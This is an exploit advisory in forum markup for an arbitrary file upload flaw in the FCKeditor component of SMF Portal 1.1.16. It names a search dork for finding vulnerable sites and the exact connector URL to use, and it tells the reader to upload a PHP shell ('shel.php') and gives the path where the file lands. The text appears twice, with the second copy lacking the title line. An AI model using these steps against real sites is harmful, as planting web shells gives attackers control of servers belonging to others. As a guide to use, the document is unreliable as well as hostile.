[align=LEFT][»] Title : [ SMF Portal 1.1.16 (fckeditor) Arbitrary File Upload Vulnerability ]
[»] TestedON: [ LINUX ]
[»] Download: [ http://www.simplemachines.org/ ]
[»] Author : [ HELLBOY }
[»] Email : [ [email protected] ]
[»] Date : [ 2012-1-20 ]
[»] Version : [ 1.1.16 ]
[»] Dork : [ "Powered by SMF 1.1.16" ]
#########################
InformatioN :
Go to url : http://target/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
SELECT You'r Shell and Click OK.
Formats can be uploaded (Php6, php. ,...)
You Must Upload This File : shel.php
Uploaded File Location : Target.com/tp-images/File/File Name
===[ Exploit ]===
[»] http://Target/[patch]/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
[/align]
[»] TestedON: [ LINUX ]
[»] Download: [ http://www.simplemachines.org/ ]
[»] Author : [ HELLBOY }
[»] Email : [ [email protected] ]
[»] Date : [ 2012-1-20 ]
[»] Version : [ 1.1.16 ]
[»] Dork : [ "Powered by SMF 1.1.16" ]
#########################
InformatioN :
Go to url : http://target/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
SELECT You'r Shell and Click OK.
Formats can be uploaded (Php6, php. ,...)
You Must Upload This File : shel.php
Uploaded File Location : Target.com/tp-images/File/File Name
===[ Exploit ]===
[»] http://Target/[patch]/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
[/align]